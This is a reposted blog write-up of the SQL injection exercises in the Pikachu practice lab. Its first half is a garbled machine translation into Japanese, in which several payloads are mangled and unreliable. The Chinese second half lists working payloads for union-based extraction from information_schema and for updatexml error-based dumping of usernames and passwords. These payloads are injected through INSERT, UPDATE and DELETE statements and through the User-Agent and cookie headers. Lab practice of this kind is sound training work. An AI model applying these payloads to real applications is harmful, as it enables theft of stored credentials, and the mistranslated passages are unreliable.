Pikahu-SQLインジェクションモジュール

数値SQLインジェクション(POSTタイプ):

まず、1:

 

 それはポストタイプなので、キャプチャが恒久的施設として改正理由は次のとおりです。

ID = 1または1 = 1

 

 あなたが見ることができ、ページには、すべてのデータが返されました。

 

 

文字SQLインジェクション(タイプを取得します):

直接入力:

 

 文字インプラントは近くにSQL文を必要とし、その後、すべてのデータを恒久的施設を追加します。

神戸」または1 = 1#

 

 

 

 

インジェクションを検索:

文字kトライを検索:

 

 ソースコードを表示します。

選択したユーザー名、ID、「%の$名%」のようなメンバー名からの電子メール:それは、検索のSQL文で、ここで見ることができます   

 

 同様に、クロージャは、SQL文を選択することができる:k個の%「または1 = 1位:

 

 すべてのデータを取得します。

 

 

 

XX型インプラント:

データ小包は異なっている:「)または1 = 1#

 

 

 

:(関節)は、例​​えば、最後のタイプを注射します

3#によって「)順番:フィールドの数を分析します

 

2#による ')順

 

 

 フィールドの数が2である知っているかもしれません

その後、取得するために共同データベースクエリを使用しますピカチュウ

')組合選択データベース()、2#

 

クエリのデータベーステーブル

X ')組合選択TABLE_SCHEMA、TABLE_NAME INFORMATION_SCHEMA.TABLESからTABLE_SCHEMA =' ピカチュウ#

 

 

ユーザーテーブルのクエリフィールド名:

ユーザーの#をX 'table_nameは= information_schema.columnsから)組合選択TABLE_NAME、COLUMN_NAME'

 

 

 ユーザー#から「)組合を選択し、ユーザー名、パスワード:合同調査は、ユーザー名とパスワードを取得します

 

 

 

 

エラーインジェクション:

 条件:背景には、情報のシールドを与えられていません

共通機能:UPDATEXML()exactvalue()床()(床関数)

 

 其他步骤省略(可以根据上面修改payload)。直接得到用户名和密码:

k') and updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)#

 

 

 

 

 

 

 

insert注入:

插入类型sql语句: insert into member (username ,pw,sex,phonenum,email,address) valuse('hzk','123456',1,123,123,123);

 

在插入的必填项中:hzk' or  updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)  or '

 

 

其他步骤相同,复制payload即可。

 

 

update注入:

先登录进去,然后在修改信息的框中直接填入语句即可,payload和insert的相同:

hzk' or  updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)  or '

 

得到用户名和密码

 

 

 

 

 

 

 

delete类型注入:

 

删除时抓包看一下:

 

 后台根据id然后删除,发送到repeater,然后改包:

id= 1 or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)

 

 因为是在url中,所以需要进行url的编码:

 

 

 

 

得到用户名密码。

 

 

 

Http Header注入:

登陆之后发现有对头部信息的获取,所以可能存在注入

 

 抓包:

 

 修改user-agent或者cookie完成注入:

firefox'or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1) or '

  得到用户名密码。

おすすめ

転載: www.cnblogs.com/hzk001/p/12309317.html